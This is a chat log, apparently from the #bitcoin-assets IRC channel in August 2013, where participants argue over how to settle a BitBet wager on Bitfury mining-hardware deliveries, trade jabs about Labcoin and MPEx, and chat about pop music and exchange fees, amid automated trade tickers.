you'd agree... otherwise I'll have to clear my schedule ;) Aug 29 21:26:41 [BTCTC] [ACTIVEMINING] 4 @ 0.00461 = 0.0184 BTC [-] Aug 29 21:26:44 so, i prefer to ask whether anyone actually ordered that product (regardless of actual HW) Aug 29 21:27:03 because if someone ordered and did not get it yet, then bet is false Aug 29 21:27:09 mircea_popescu: can the bets be canceled, then? Aug 29 21:27:28 and is there a fee or something for that Aug 29 21:27:40 i am not canceling anything right now Aug 29 21:27:46 but i just want to know is it even possible Aug 29 21:27:47 I'd cancel if Anduck agrees. Aug 29 21:27:59 This will give me a headache Aug 29 21:28:15 ;) Aug 29 21:28:21 well, i was right anyway Aug 29 21:28:37 they deliver the promised performance. that's it Aug 29 21:28:40 the bet was about that Aug 29 21:28:49 No, you weren't -- not according to the bet langugage -- which is what matters Aug 29 21:28:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02637 BTC [-] Aug 29 21:28:58 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.000811 = 0.0041 BTC [+] Aug 29 21:29:06 you can't just say 'Oh, that langugage is not what I meant!!' Aug 29 21:29:07 you're just trying to make "unit" be a "h-board" Aug 29 21:29:16 i think unit is the mining unit. Aug 29 21:29:20 I'm trying to make a unit what was advertised -- 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips Aug 29 21:29:25 thats a UNIT Aug 29 21:29:25 the mining unit can include anything Aug 29 21:29:36 we need at least one 400gh fullfilled order (regardless of how many boards), does it exist? Aug 29 21:29:37 its right on their website -- 400Gh mining unit "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 29 21:29:42 thats hardware promise - that wasn't met. but it wasn't about hardware Aug 29 21:29:46 it's about performance Aug 29 21:29:51 [BTCTC] [LABCOIN] 348 @ 0.003713 = 1.2921 BTC [+] Aug 29 21:29:53 [BTCTC] [LABCOIN] 2 @ 0.003718 = 0.0074 BTC [+] Aug 29 21:29:54 [BTCTC] [LABCOIN] 1 @ 0.003719 BTC [+] Aug 29 21:29:55 [BTCTC] [LABCOIN] 423 @ 0.003768 = 1.5939 BTC [+] Aug 29 21:29:56 [BTCTC] [LABCOIN] 174 @ 0.003769 = 0.6558 BTC [+] Aug 29 21:29:57 [BTCTC] [LABCOIN] 100 @ 0.003772 = 0.3772 BTC [+] Aug 29 21:29:58 [BTCTC] [LABCOIN] 50 @ 0.003773 = 0.1887 BTC [+] Aug 29 21:29:59 [BTCTC] [LABCOIN] 152 @ 0.003785 = 0.5753 BTC [+] Aug 29 21:30:08 jurov: it can't be regarless of h-boards because thats not what was advertised on a performance basis -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 29 21:30:09 fractal, it's usual that specs are subject to change Aug 29 21:30:28 promies was only about performance of whole setup Aug 29 21:30:29 jurov: i dont disagree -- but not according to the bet langugae Aug 29 21:30:45 for me unit = whetever was ordered Aug 29 21:31:08 jurov: for most objective people a unit is a single device and 'UNITS' are multiple Aug 29 21:31:16 and now i want to know whether *any* 400gh order was fullfilled Aug 29 21:31:21 [BTCTC] [LABCOIN] 50 @ 0.003768 = 0.1884 BTC [-] Aug 29 21:31:28 because it seems it was not Aug 29 21:31:38 I only made the bet based on what I say on the bitfury website -- that a 400Gh unit was "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 29 21:31:43 jurov: yeah there isn't any delivered yet Aug 29 21:31:59 but there might be shipped 400 gh units. Aug 29 21:32:00 and thus any bickering about what hardware the 400gh means is noot Aug 29 21:32:04 [BTCTC] [CB.IDIFF-O] 1 @ 0.009899 BTC [+] Aug 29 21:32:06 *moot Aug 29 21:32:20 [BTCTC] [LABCOIN] 450 @ 0.00368 = 1.656 BTC [-] Aug 29 21:32:22 jurov: what do you think, does it require a delivery of 400 gh unit? Aug 29 21:32:34 since it's proven that 400gh unit will meet the spec Aug 29 21:32:34 yes, certainly Aug 29 21:32:40 why? Aug 29 21:32:49 it says "5 deliveries confirmed" Aug 29 21:32:56 the other thing i'm worried about is punin sending pictures to a forum user and paying them to post a 400Gh unit saying its hashing at 400Gh -- rumour has it punin made the 10BTC yes bet Aug 29 21:33:05 and it's proven only of someone actually builds 400gh rig from it Aug 29 21:33:07 i made the 10btc bet Aug 29 21:33:13 when has not happened either Aug 29 21:33:16 *what Aug 29 21:33:34 well Aug 29 21:33:45 there actually was weeks ago a 400gh rig built from these h-boards Aug 29 21:33:50 the same that were shipped to me Aug 29 21:33:53 same kind of Aug 29 21:33:59 Anduck: I'm in for nearly that on the NO side... Aug 29 21:34:39 have there been 5 deliveries of either of the units? Aug 29 21:34:58 jborkl, only the 25ghs Aug 29 21:35:02 there are most likely going to be 5 deliveries of the 25gh units Aug 29 21:35:08 fractal Anduck http://pastebin.com/JgudvNWW that's a paste of the article. Aug 29 21:35:14 since motherfuckin server is still diddling ;/ Aug 29 21:35:33 [BTCTC] [CB.IDIFF-O] 1 @ 0.007914 BTC [-] Aug 29 21:36:05 Anduck: according to the wording its totally not fair for 2 M-boards or multiple hardware considered a 400gh 'unit' since the company advertised a 400Gh unit as "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips"" --- to be honest -- the vagureness of the langugage makes it unfair for either side to win or lose -- Aug 29 21:36:09 jurov: I would think reading it first order of business is the 5 delivery, as you were looking at Aug 29 21:36:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02637 BTC [-] Aug 29 21:36:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.02637 = 0.0791 BTC [-] Aug 29 21:36:45 now the question is, whether we require proof of one 400gh order filled, too Aug 29 21:36:54 or are 5x25gh sufficient Aug 29 21:37:10 I think the 5 25 would be sufficient Aug 29 21:37:17 jurov: it's not just 400Gh being shipped --- its 400Gh in a single unit as advertised -- if they ship more hardware to make it up for it -- its because performance wasn't met Aug 29 21:37:22 What if no one ordered a 400? Aug 29 21:37:48 jborkl: I asked mircea_popescu this question , in the logs he said he'd like to see proof of a 400Gh unit as well as a 25Gh unit ... i dont have logs tho Aug 29 21:37:58 i can get them if needed tho Aug 29 21:38:02 fractal they're in the topic Aug 29 21:38:04 i think the 5x 25gh would be sufficient too (but my opinion must be non-counting due to the fact i am on "yes" side of the bet) Aug 29 21:38:05 :P Aug 29 21:38:08 http://log.bitcoin-assets.com Aug 29 21:38:34 the problem here I think is what is a 'UNIT' --- this is what we're debating ;) Aug 29 21:38:40 http://log.bitcoin-assets.com/#270705 Aug 29 21:38:45 jborkl how much was the 400 ? like 150 btc or something ? Aug 29 21:38:47 #bitcoin-assets log Aug 29 21:38:59 i am not sure actually Aug 29 21:39:13 mircea_popescu: i'm reading the bet cancellation policy link now... thanks Aug 29 21:39:30 what were the 25 selling for ? Aug 29 21:39:30 [BTCTC] [RSM] 1 @ 0.0149 BTC [-] Aug 29 21:39:34 Anduck what'd you pay ? Aug 29 21:39:41 mircea_popescu: there is an example of 400 ghash unit but it was a demo, not delivered unit. but that can be delivered if anyone bought it. it's the same m-boards and h-boards.. just enough of them to make the hashrate of 400gh Aug 29 21:39:51 mircea_popescu: 25gh sold for 1000 euros Aug 29 21:39:54 [BTCTC] [ACTIVEMINING] 1 @ 0.004896 BTC [+] Aug 29 21:39:55 [BTCTC] [ACTIVEMINING] 19 @ 0.004897 = 0.093 BTC [+] Aug 29 21:40:06 as i said if no 400gh order was delivered, and we require at least one, then the bit was not filled Aug 29 21:40:07 i paid for 2x 25 Ghash starter kit Aug 29 21:40:13 it'd be pretty crazy if nobody bought a 400 then Aug 29 21:40:28 regardless whether it can be built out of smaller ones Aug 29 21:40:47 mircea_popescu: true. but we don't know was the first orders (that were shipped this week) including a 400gh miner. but it's proven that it does work if one actually bought one Aug 29 21:40:54 [BTCTC] [ACTIVEMINING] 31 @ 0.004897 = 0.1518 BTC [+] Aug 29 21:40:57 the bet does not specify which 5 devices Aug 29 21:41:00 mircea_popescu: so you suggest cancelling bet buy betting on the other side ... the weight is too low though ;) i dont have enough BTC ;( Aug 29 21:41:04 and it works = meets the adverticed performance. it's been proven earlier Aug 29 21:41:08 and to clarify I do not have a order or a bet Aug 29 21:41:22 fractal pretty much the only way it works, make your bet neutral. Aug 29 21:41:28 What is the bet? Aug 29 21:41:40 this is an important point to remember : you NEVER bet on a bet such that you can't neutralize it later should you need to. Aug 29 21:41:40 http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ Aug 29 21:41:45 just one of them things. Aug 29 21:41:47 BitBet - Bitfury EU August orders will ship before 1st September 2013 Aug 29 21:42:02 jborkl the rationale is that since there's an A and a B in the bet, and 5 proofs, you want those 5 proofs rto include both A and B Aug 29 21:42:12 somehow, somewhere. else the bet is only half satisfied Aug 29 21:42:20 but B = X*A Aug 29 21:42:21 well, then we have our answer Aug 29 21:42:22 if they failed to sell 400gh then..well it's a failure Aug 29 21:42:39 jurov: but that's just plain wrong.. Aug 29 21:42:41 jurov it'd be fucking crazy tho. what, they sold like 9 boards to 5 ppl ? Aug 29 21:42:45 i'd agree. Aug 29 21:43:24 I do think the wording on the bets needs work, more people would bet if they were clearer Aug 29 21:43:31 Forget about the 400Gh being shipped -- the issue is what defines a 'UNIT' as advertised and meeting performance specs Aug 29 21:43:31 so about the bet.. can the 5 confirmed deliveries be any orders? Aug 29 21:43:50 Anduck: of course not -- if they dont ship a 400Gh order they are just like BFL Aug 29 21:43:53 what do you mean any orders ?! Aug 29 21:44:01 mircea_popescu: 25gh or 400gh Aug 29 21:44:06 fractal: i agree Aug 29 21:44:12 well so far all we have is yours afaik. Aug 29 21:44:40 more confirms of any kind can in no way hurt. Aug 29 21:44:45 they can ship 400gh.. it's built from same m-boards and h-boards. Aug 29 21:44:46 mircea_popescu: true Aug 29 21:44:50 "Further to the above, TradeFortress has announced that Coinlenders is closing - and that the current site is only a demo, but one which has the same functionality as a real site would (a similarish approach to BTC-TC's "it's just a game" stance - though actually a worse one from an investor's perspective)." Aug 29 21:45:00 mircea_popescu: how about if a 400gh unit was shipped this week but not delivered? Aug 29 21:45:03 a ponzi dies before its time? Aug 29 21:45:15 and 5 25gh starter kit orders were delivered? Aug 29 21:45:33 Common man!! the bet specifically says "Delivered" Aug 29 21:45:34 [BTCTC] [LABCOIN] 19 @ 0.003676 = 0.0698 BTC [-] Aug 29 21:45:40 [BTCTC] [LABCOIN] 13 @ 0.003675 = 0.0478 BTC [-] Aug 29 21:45:42 5 units delivered, yes Aug 29 21:45:45 [BTCTC] [LABCOIN] 57 @ 0.003555 = 0.2026 BTC [-] Aug 29 21:45:54 but doesn't specify which kind of units, 25 or 400 ghash Aug 29 21:46:09 the bet is about that they will ship their boards in time and they meet the performance Aug 29 21:46:20 and i think that is met if there are 5 confirmed deliveries Aug 29 21:46:28 jborkl re the wording : any time one sees a badly worded bet they can make a better worded one, which at least theoretically would create an advantage for his bet over the old bet and people would flock there. Aug 29 21:46:35 the 25gh kit and 400gh kit are built from same modular units Aug 29 21:46:38 there needs to be at least 1 400Gh UNIT hashing as advertised -- and if they miss performance, sending more UNITS doesn't count Aug 29 21:46:41 Anduck well no, it has to be delivered. Aug 29 21:47:16 [BTCTC] [NASTY-PT] 3 @ 0.002989 = 0.009 BTC [+] Aug 29 21:47:22 mircea_popescu: what if nobody ordered one? Aug 29 21:47:35 "will ship their 25 and 400" << it's AND not OR Aug 29 21:47:38 well then wtf they made the bet including it for ?! Aug 29 21:47:41 Anduck: then the statement in the bet fails. Aug 29 21:47:44 its a no Aug 29 21:47:45 jurov: shipping =/= delivery Aug 29 21:48:04 the delivery is about 5 units, shipping is about 25gh and 400gh.. Aug 29 21:48:14 both unit are built from same modular parts Aug 29 21:48:30 which in my eyes doesn't really need both of the mining units shipped Aug 29 21:48:31 obviously the delivery and shipping should be subject to same conditions Aug 29 21:48:32 i guess that's an argument. Aug 29 21:48:44 Anduck: Honestly, it seems to me like you wrote a vague bet, that other people have read totally differently, and you're trying to change 'what you meant' .... its not fair man, seriously. Aug 29 21:48:46 not sure how strongly persuasive Aug 29 21:48:57 fractal he wrote it ?! Aug 29 21:49:02 i wrote it yes Aug 29 21:49:04 i bet the 10 btc Aug 29 21:49:05 mircea_popescu: he claimes he wrote it Aug 29 21:49:06 i already said it Aug 29 21:49:33 a. Aug 29 21:49:48 well you know it's always good policy to get the manufacturer to write the bet, even if you want to bet on yes. Aug 29 21:49:57 yes Aug 29 21:49:59 they know wtf is going on, don't include 400gh if they have no orders to ship for 400gh etc Aug 29 21:50:02 i see 3 requirements: a) they must ship both kinds of devices (25G and 400G) before 1st. b) both kinds of devices must meet power/speed requirements. c) 5 deliveries confirmed (this req. doesn't specify which kind of devices) Aug 29 21:50:15 mircea_popescu: which I think would make it a conflict of intrest for him to debate it -- I think 3rd parties who are neutral should strictly look at the language -- otherwise he can just say 'oh, thats not what i meant!' and fuck over the NO bets ;( Aug 29 21:50:35 mircea_popescu: yeah, true. but that the bet shouldnt be failed due that.. they're all same modular cards that the mining unit is built from Aug 29 21:50:39 Anduck, you really meant different conditions for shipping and delivery? i don't believe that Aug 29 21:50:39 fractal he has no involvement in the decision of it tho, so why shouildn't he argue it ? Aug 29 21:50:48 it's been proven that a mining card does meet the advertised performance.. Aug 29 21:50:50 [BTCTC] [ACTIVEMINING] 9 @ 0.004899 = 0.0441 BTC [+] Aug 29 21:50:56 jurov: not really Aug 29 21:51:10 kakobrekla : http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/#c1295 Aug 29 21:51:13 but if there wasn't any 400gh units ordered in the first ordered units Aug 29 21:51:14 FIRST SPAM ON BITBET! Aug 29 21:51:18 it took 8 months. Aug 29 21:51:26 mircea_popescu: maybe the deciders will read these logs and the conversation on the page and be influenced Aug 29 21:51:32 LOL Aug 29 21:51:35 i doubt they give a shit. Aug 29 21:51:38 that was me, I'm selling Chinese Kitchens Aug 29 21:51:47 ha Aug 29 21:51:54 seriously wtf is wrong with mpoe-pr? what a fucking assclown Aug 29 21:52:04 gotta have a place for the hamburgers! Aug 29 21:52:20 bobbabad_ care to phrase a complaint ? Aug 29 21:52:30 i heard bitfury already has a killer mining pool Aug 29 21:52:32 all this bitbet delivery betting is a chore Aug 29 21:52:39 i like her, she delivers butthurt to the bitcoin masses Aug 29 21:52:44 mircea_popescu: is it you or is it someone working for you/mpex? Aug 29 21:52:48 i like the concept Aug 29 21:52:56 but oh bitching when they resolve... Aug 29 21:52:56 it is someone working for me. Aug 29 21:52:57 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ << this will be interesting then, too Aug 29 21:53:02 BitBet - KnCMiner will deliver ASIC devices before October 1st Aug 29 21:53:08 jurov: the "will ship their 25ghash and 400gash units in time".. if there wasn't any 400 ghash units ordered in the first orders... but it's been proven that it can be built (why wouldn't it be possible? just attach the cards) and it will meet the spec Aug 29 21:53:09 at least i did not mix shipping and delivery there Aug 29 21:53:22 jurov word. Aug 29 21:53:25 Wow. We're still talking about this? Aug 29 21:53:31 kleeck: yes Aug 29 21:53:42 if sent via teleportation does it count as delivery? Aug 29 21:53:45 dude, the may bfl delivery bet took what, two weeks ? Aug 29 21:53:53 [HAVELOCK] [VTX] 1 @ 0.5711 BTC [+] Aug 29 21:53:53 ffs. Aug 29 21:53:55 [HAVELOCK] [VTX] 1 @ 0.613 BTC [+] Aug 29 21:54:00 ThickAsThieves receipt is the measure of delivery :D Aug 29 21:54:04 mircea_popescu: you both seem to enjoy the occational rant but posts like this https://bitcointalk.org/index.php?topic=263445.msg3036369#msg3036369 Aug 29 21:54:08 Bunnyh: if the 400Gh doesn't actaully hit 400Gh, would you say that the unit did not meet performance ? (Then , if the company was nice and sent a refund, or more hardware, would it change the fact that the 400Gh unit didn't hit performance hashrate" ? Aug 29 21:54:08 Anduck, if no one bought 400gh unit, then they failed in bigger sense Aug 29 21:54:14 mircea_popescu: what's your opinion about the "5 delivered orders" Aug 29 21:54:21 jurov: but thats not really part of the bet Aug 29 21:54:26 they ship what people ordered Aug 29 21:54:28 thats the bet¨ Aug 29 21:54:28 Are we just saying the same thing over and over, guys? Aug 29 21:54:34 bobbabad_ she is exacrtly right. Aug 29 21:54:37 if nobody ordered 400 ghash, then they only shipped 25 ghash Aug 29 21:54:39 Anduck, both was already answered Aug 29 21:54:43 i missed this whole argument, but i say, when shit is this hard to sort, you are solving the wrong problem Aug 29 21:54:43 i am win Aug 29 21:54:45 and 5 orders delivered.. it should be a yes,then Aug 29 21:54:51 Anduck: The bet says what the bet says. if no 400Gh device is delivered, the bet is a NO Aug 29 21:54:52 ThickAsThieves that's not even true Aug 29 21:55:05 it says 25 and 400GH units must be delivered Aug 29 21:55:13 fractal: i don't really have a good opinion on how to decide, if they did deliver 400GH for everyone who ordered 400GH, and the total hardware doesn't consume more power than advertised (but would consist of more than 1 master board with 16 hashing boards) Aug 29 21:55:14 AND Aug 29 21:55:21 just one unreasonable dude? Aug 29 21:55:27 actually it says that they will ship the units Aug 29 21:55:32 mircea_popescu: I get you the two of you like to cause drama and stir the pot... but with posts like that you both just looks like assclowns Aug 29 21:55:35 shipping is not delivering Aug 29 21:55:41 [BTCTC] [MININGCO.ETF] 3 @ 0.1193 = 0.3579 BTC [+] Aug 29 21:55:42 ThickAsThieves it's a problem this, getting language to work for the purpose of communication in a novel space. Aug 29 21:55:46 Bunnyh: right -- they're getting more , but the actual hardware itself missed specs -- this is what i based my NO bet on Aug 29 21:55:54 most intellectual spaces have what's called "Terms of art" to come to terms with the problem Aug 29 21:55:57 we don't. yet. Aug 29 21:56:06 but that's the problem bitbet is resolving. slowly and verbosely. Aug 29 21:56:07 fractal: if the yes/no decision comes to that issue, it will be a really tough call Aug 29 21:56:07 as it should. Aug 29 21:56:17 Anduck, they did not even ship 400gh unit/order/whatever. problem solved Aug 29 21:56:24 Yes. Let's argue over what a "mining unit" really means. :D Aug 29 21:56:27 Bunnyh: the bet was about advertised performance, not about advertised hardware amount Aug 29 21:56:27 bobbabad_ who are you and why do you think it matters how things look to you ? Aug 29 21:56:45 [BTCTC] [DMS.SELLING] 39 @ 0.01256 = 0.4898 BTC [-] Aug 29 21:56:51 Anduck: and it missed performance Aug 29 21:56:56 thats why they're shipping more hardware Aug 29 21:57:15 ...to meet the promised performing of the unit Aug 29 21:57:19 the unit that a customer has bought Aug 29 21:57:32 and the unit didn't meet performance , so they had to send more Aug 29 21:57:35 UNIT Aug 29 21:57:41 they didnt send more units Aug 29 21:57:50 haha, nice comeback... It fascinates to try to understand the underlieing motivation of self destruction Aug 29 21:57:51 http://thegenesisblock.com/bitfury-400-ghs-bitcoin-mining-rig-hits-us-shores/ this is a UNIT -- any more hardware is just making up for it missing performance hashrate numbers Aug 29 21:57:52 they send the mining unit that people ordered Aug 29 21:57:53 Bitfury 400 GH/s Bitcoin Mining Rig Hits US Shores - The Genesis Block Aug 29 21:58:28 bobbabad_ it's not a comeback. it's an attempt to help you start on the work of self-education. do try and answer the question, it's important. Aug 29 21:58:49 Anduck: and that unit is hashing at 380Gh... if they send some more hardware, it doesn't change the fact that the 400Gh unit is only 380Gh. Aug 29 21:59:05 [BTCTC] [DMS.SELLING] 11 @ 0.01256 = 0.1382 BTC [-] Aug 29 21:59:06 [BTCTC] [DMS.SELLING] 19 @ 0.01258 = 0.239 BTC [+] Aug 29 21:59:12 i sort-of wonder if after this people will go have some nice icecream and argue over the cones with the poor hapless waitress. Aug 29 21:59:18 fractal: the unit is hashing at 400 ghash. the unit has more h-boards that was told at the site (when they ordered) but that doesn't change the performance of the ordered unit Aug 29 21:59:22 little will she know that BITCOIN!!! touched her life. Aug 29 21:59:24 I think most people, looking at a picture would call 1 thing a UNIT, and 2 things multiple UNITS Aug 29 21:59:36 fractal what about the power brick ? Aug 29 21:59:39 Anduck: No, its not. The unit missed performance numbers Aug 29 21:59:48 mircea_popescu: its attached Aug 29 21:59:49 is it two units ? Aug 29 21:59:55 fractal, one unit is one order Aug 29 22:00:21 mircea_popescu: so you seriously believe that "Your entire "asset" (Labcoin) consists of Burnside pasting fake trades to create an illusion of interest".. Aug 29 22:00:29 but seriously, if i buy a laptop, which comes as two item (power supply + laptop) am i buying one or two units ? Aug 29 22:00:31 jurov: thats totally wrong. thats like saying a BFL single is a UNIT if they ship 2 to make up for it Aug 29 22:00:39 the two of you are clearly trolling, there is now way you can be that stupid Aug 29 22:00:56 bobbabad_ i can ignore you if you absolutely want that. Aug 29 22:01:00 mircea_popescu: you're splitting hairs now i think ;) Aug 29 22:01:11 fractal ok, but do answer. is it a unit or two ? Aug 29 22:01:35 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [+] Aug 29 22:01:37 [BTCTC] [ASICMINER-PT] 2 @ 2.681 = 5.362 BTC [+] Aug 29 22:01:47 mircea_popescu: depends what your definition of unit is, i suppose.... i think most people would say its one unit.... but if there were 2 laptops, because the first laptop wasn't fast enough, it would be 2 units Aug 29 22:01:47 [BTCTC] [ASICMINER-PT] 1 @ 2.684 BTC [+] Aug 29 22:01:48 mp Pale Phoenix really doesnt like you (labcoin thread) "Perhaps I should be more tolerant of manic, shrill bullies like PRBot. It must be quite tragic to be so sure that you stand at the center of the universe, only to realize that you're just another decaying bit of yesterday's news." Aug 29 22:02:07 towers and geniuses Aug 29 22:02:10 ThickAsThieves not sure why they're that aggitated anyway. Aug 29 22:02:20 you know exactly why Aug 29 22:02:21 lol Aug 29 22:02:28 well ok, i know exactly why. you caught me :p Aug 29 22:02:31 [BTCTC] [LABCOIN] 38 @ 0.003769 = 0.1432 BTC [+] Aug 29 22:02:32 [BTCTC] [LABCOIN] 19 @ 0.00377 = 0.0716 BTC [+] Aug 29 22:02:34 [BTCTC] [LABCOIN] 156 @ 0.003797 = 0.5923 BTC [+] Aug 29 22:02:50 mircea_popescu: So, 1 UNIT would be what was required to operate the original laptop at advertised specs.... if the company sent you a 2nd laptop to make up for the fact that your first laptop wasn't good enough -- you received 2 UNITS Aug 29 22:03:09 but you can't really run the laptop w/o power except for two hours Aug 29 22:03:09 mircea_popescu: but your first laptop+brick as a UNIT wasn't at specs Aug 29 22:03:17 you bought a laptop that'd run for months not for hours. Aug 29 22:03:27 mircea_popescu: right -- i meants the 2nd laptop comes with a power cord also Aug 29 22:03:28 So there's like two arguements going on at once in here I see Aug 29 22:03:43 Rulother: yes Aug 29 22:03:43 wanna start another? Aug 29 22:03:43 anyway, niot saying the laptop example controls Aug 29 22:03:50 ;) Aug 29 22:03:57 just saying that the definitions of words aren't at all that pinned down as we like to think them Aug 29 22:04:05 which has been perpetually a problem in any attempt at justice. Aug 29 22:04:09 I respect Miley Cyrus as an artist an female Aug 29 22:04:22 mircea_popescu: i agree.... thats why law is a difficult field Aug 29 22:05:23 ThickAsThieves i think it died once fractal said the magical word i agree Aug 29 22:05:33 you're not allowed to agree with anything if you want a good argument to keep going Aug 29 22:05:54 reason prevails Aug 29 22:05:58 oh well Aug 29 22:07:18 I think she's a crazy mastermind Aug 29 22:07:25 She has everyone talking about her Aug 29 22:07:43 So she's relevant again Aug 29 22:08:06 why are people surprised, isnt this the Madonna/Cher/Britney formula? Aug 29 22:08:22 who started this formula Marylin Monroe maybe? Aug 29 22:08:31 Mozart before that Aug 29 22:08:32 what, skin them, fill the husk with hay and reannimate it with the dark arts of necromancy ? Aug 29 22:09:08 just add in sexualness, and yes Aug 29 22:09:20 masturbatory sexualness, i think it comes as a food additive. Aug 29 22:10:31 Mozart was a sexual freak Aug 29 22:10:44 meanwhile Taylor Swift is relieved she is still allowed to have a soul Aug 29 22:11:01 Well she just consumes souls and then writes about it and makes money Aug 29 22:11:18 She's a succubus Aug 29 22:11:23 possibly Aug 29 22:11:30 Swift moved to Nashville, Tennessee at the age of fourteen to pursue a career in country music. Aug 29 22:11:34 a siren, more appropriately Aug 29 22:11:34 you know i never heard of her. Aug 29 22:11:37 recommend something ? Aug 29 22:11:43 dont bother Aug 29 22:11:45 I can't do that Aug 29 22:11:46 a ok Aug 29 22:11:50 bubblegum stuff Aug 29 22:12:03 she's still a good kid though Aug 29 22:12:04 Actually, look up "22" Aug 29 22:12:09 i wouldn't want to miss up on the next cher. Aug 29 22:12:14 [MPEX] [S.MPOE] 9384 @ 0.00087065 = 8.1702 BTC [+] Aug 29 22:12:16 i wanna scoop her up early Aug 29 22:12:16 [MPEX] [S.MPOE] 5466 @ 0.00087157 = 4.764 BTC [+] Aug 29 22:12:51 hm, did that bobbard character only drop by to bitch about mpoe-pr ?! Aug 29 22:13:02 He's a big labcoin guy Aug 29 22:13:06 fanboi that is Aug 29 22:13:09 at this rate she's going to be more famous than me Aug 29 22:13:11 i wonder how many forum geniuses lurk here Aug 29 22:13:33 i wonder why people don't just say "dude, i'm a big labcoin fan, because x y z" Aug 29 22:13:45 rather than this underhanded bs. does anyone actually imagine it works ?! Aug 29 22:13:49 they do Aug 29 22:14:05 accept x y z all translate to "cuz i bought some" Aug 29 22:14:13 AMAZING COMPANY Aug 29 22:14:20 well that's not so very great a reason is it. Aug 29 22:14:29 I'm going to automatically ignore anyone that says that on the forums Aug 29 22:14:41 so I know who to weed out Aug 29 22:14:42 "please agree X is a great company to spare me the emoptional cost of readjusting with a contrary and grossly dissinterested reality" Aug 29 22:15:06 theyd rather make money by mistake than on purpose Aug 29 22:15:08 so much cooler Aug 29 22:15:10 ^ Aug 29 22:15:22 dude you've been touched by truth. that's true innit. Aug 29 22:15:28 that's exactly true. Aug 29 22:16:03 well, i gotta run... talk to you guys later. Aug 29 22:16:23 peace Aug 29 22:18:59 hey mircea_popescu , what do you think of just-dice.com ? very impressive IMO. Aug 29 22:19:49 although the investment ROI has stalled in the past couple weeks... but i think whoehver bought SD madea mistake ;) Aug 29 22:19:53 fractal i was one of the large early investors. Aug 29 22:20:22 [BTCTC] [LABCOIN] 2 @ 0.003797 = 0.0076 BTC [+] Aug 29 22:20:30 there;s anarticle on trilema discussing it somewhere, remind me to link you sometime Aug 29 22:20:54 ;;google trilemanjust-dice Aug 29 22:20:54 No matches found. Aug 29 22:21:00 ;;google trilema just-dice Aug 29 22:21:00 Perfect money corrupts absolutely pe Trilema - Un blog de Mircea ...: ; A compedium of compressed Bitcoin points pe Trilema - Un blog de ...: ; I state problems, I receive solutions. A happiness is me. pe Trilema ...: oh its down still Aug 29 22:21:37 sadly. Aug 29 22:21:49 nice... you must have done well... they need a few more whales to play to get the profit up to 1% tho... can't belive 1 guy took them for 4000BTC Aug 29 22:21:54 well, I'm still at a loss from my small investment on JD. bad timing Aug 29 22:22:06 i hadn't realised how fucking integral to btc ecosystem trilema is. i'll have to get redundancy for that too now ?! Aug 29 22:22:26 fractal iirc i made ~20 btc betting too Aug 29 22:22:30 I made an investment a couple weeks ago,,, profit seems to have stalled there for a bit Aug 29 22:22:32 bujt nothing like the whale. Aug 29 22:22:40 same principle, not same volume Aug 29 22:23:42 http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/#c1302 << SHOCKING!!! Aug 29 22:23:50 BitBet - Labcoins own 130nm design sample chips will be received by testers by 12TH SEPT 2013 Aug 29 22:23:53 someone actually rtemembers what scamlab was claiming a few weeks back Aug 29 22:24:31 ok, well maybe i aught to add a random number to this thing now... Aug 29 22:25:37 [BTCTC] [BASIC-MINING] 1 @ 0.1921 BTC [-] Aug 29 22:25:38 [BTCTC] [BASIC-MINING] 5 @ 0.192 = 0.96 BTC [-] Aug 29 22:25:40 [BTCTC] [BASIC-MINING] 3 @ 0.1917 = 0.5751 BTC [-] Aug 29 22:25:41 [BTCTC] [BASIC-MINING] 13 @ 0.1916 = 2.4908 BTC [-] Aug 29 22:25:51 mircea_popescu: have you ever thought about lowering your fee to join mpex? maybe you'll get more volume/make more in fees? Aug 29 22:26:18 the fee was originally 0, for people who wanted to beta. it went up from 20 to 30 when glbse failed. Aug 29 22:26:29 i've said it's only going to go up in the future, and it's a fact. Aug 29 22:26:31 There's a service out there, that will do the trading for you with a small % per transaction. Forgot the name :P Aug 29 22:26:38 Rulother coinbr.com you mean ? Aug 29 22:26:42 I bet you could get 100's of people at 1-2BTC, Aug 29 22:26:43 yeah Aug 29 22:26:54 fractal there's brokers doing exactly that. Aug 29 22:27:02 this is deliberate, helping the community professionalize. Aug 29 22:27:13 https://coinbr.com/ref?c=Q9gPSuUvYS Aug 29 22:27:18 About CoinBr Aug 29 22:27:20 :) Aug 29 22:27:21 if random chinese asic manufacturers would help rather than hinder we'd be moving a lot faster, but even so, we're moving. Aug 29 22:27:22 hah Aug 29 22:27:45 mircea_popescu: if significant competition comes around would you adjust to the market? Aug 29 22:28:15 significant competition would participate in the same market, face the same constraints and take the same measures, Aug 29 22:28:17 ifg they're smart. Aug 29 22:28:22 i have mpex AND coinbr Aug 29 22:28:25 big pimpin Aug 29 22:28:27 mircea_popescu: why not start a btct.co type site using your backend code? ;) you can own the small-fish market and big-fish Aug 29 22:28:30 they'd certainly fail otherwise. so no, i'd just wait for them to die. Aug 29 22:28:51 nobody wants to deal with bitcoin small fish. Aug 29 22:29:02 because the goal is to make bitcoin work, not to try and finesse a few coins out of the masses. Aug 29 22:29:15 very noble ;) Aug 29 22:29:16 that's my job Aug 29 22:29:24 deadweasel, actually everybody except mircea does Aug 29 22:29:41 fractal i have a history, by now it's long in btc terms. Aug 29 22:29:41 [BTCTC] [LABCOIN] 10 @ 0.003794 = 0.0379 BTC [-] Aug 29 22:29:56 but do you want to deal with them? or someone with their head screwed on? Aug 29 22:30:16 mircea_popescu: i've always thought that becoming my own competition is the best way to provide the most efficient service to a market... Aug 29 22:30:25 deadweasel lol how long are you around? Aug 29 22:30:31 not long enough. Aug 29 22:30:32 maybe. Aug 29 22:30:33 i..e launching multiple sites with diff fees/features and seeing what works Aug 29 